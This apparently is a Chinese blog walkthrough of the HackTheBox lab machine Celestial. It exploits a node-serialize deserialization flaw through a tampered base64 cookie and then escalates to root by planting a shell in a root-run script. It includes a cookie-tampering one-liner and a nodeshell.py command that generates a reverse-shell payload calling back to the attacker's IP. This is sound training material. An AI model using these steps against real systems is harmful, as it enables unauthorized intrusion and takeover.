No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习

**

HackTheBox-Linux-Celestial-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines/profile/130
靶机难度:中级(4.8/10)
靶机发布日期:2018年8月25日
靶机描述:
Celestial is a medium difficulty machine which focuses on deserialization exploits. It is not the most realistic, however it provides a practical example of abusing client-size serialized objects in NodeJS framework.

作者:大余
时间:2020-06-06

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图
可以看到靶机的IP是10.10.10.85…
No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(1)
Nmap发现了3000端口运行着http服务,Node.js框架…

No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(2)
刚进入发现404,查看前端源码也没信息…

No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(3)
在刷新页面后更新了信息…显示以上结果…前端还是没信息…
No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(4)
burpsuit拦截发现了一串base64值…

No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(5)
可以知道这是一个Node.js Express框架,根据输出结果,可以修改cookie变换输出值…
No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(6)
命令:echo eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ== | base64 -d | sed 's/"2"/"5"/g' | base64 -w0
通过"num":“2"更改"num”:"5"并使用base64对其进行了编码输入到burp中,输出结果知道这是node-serialize模块导致的…
No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(7)
这里更直观的看到这是由node-serialize模块导致的,该模块是在unserialize函数模块中导致无法验证用户提供的输入,从而执行了JSON值内的所有内容…
开始利用反序列化漏洞提权…
No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(8)
https://hd7exploit.wordpress.com/2017/05/29/exploiting-node-js-deserialization-bug-for-remote-code-execution-cve-2017-5941/
这里详细讲述了node-serialize模块的利用方式…
No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(9)
按照文章利用即可…
No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(10)
命令:sudo python nodeshell.py -r -h 10.10.14.51 -p 6666 -e -o
创建好shellcode…
No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(11)
然后利用burpsuit注入shell即可…
成功获得反向外壳…
No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(12)
获得了user_flag信息…
查看到还存在script.py脚本信息…
No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(13)
该脚本很可疑,我下载了pspy监测后端进程…上传
No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(14)
果然发现了该程序是在运行了…但不是root权限?
No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(15)
查看了后端日志后…发现该程序在执行root权限…尝试植入shell
No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(16)
利用简单shell,echo植入即可…
No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(17)
等待了好久…估计10分钟…才获得了反向外壳…pspy32监测一直没运行script.py…
获得了root权限,并获得了root_flag信息…

简单的提权…

由于我们已经成功得到root权限查看user和root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

No.127-HackTheBox-Linux-Celestial-Walkthrough渗透学习插图(18)

没有账号? 忘记密码?

社交账号快速登录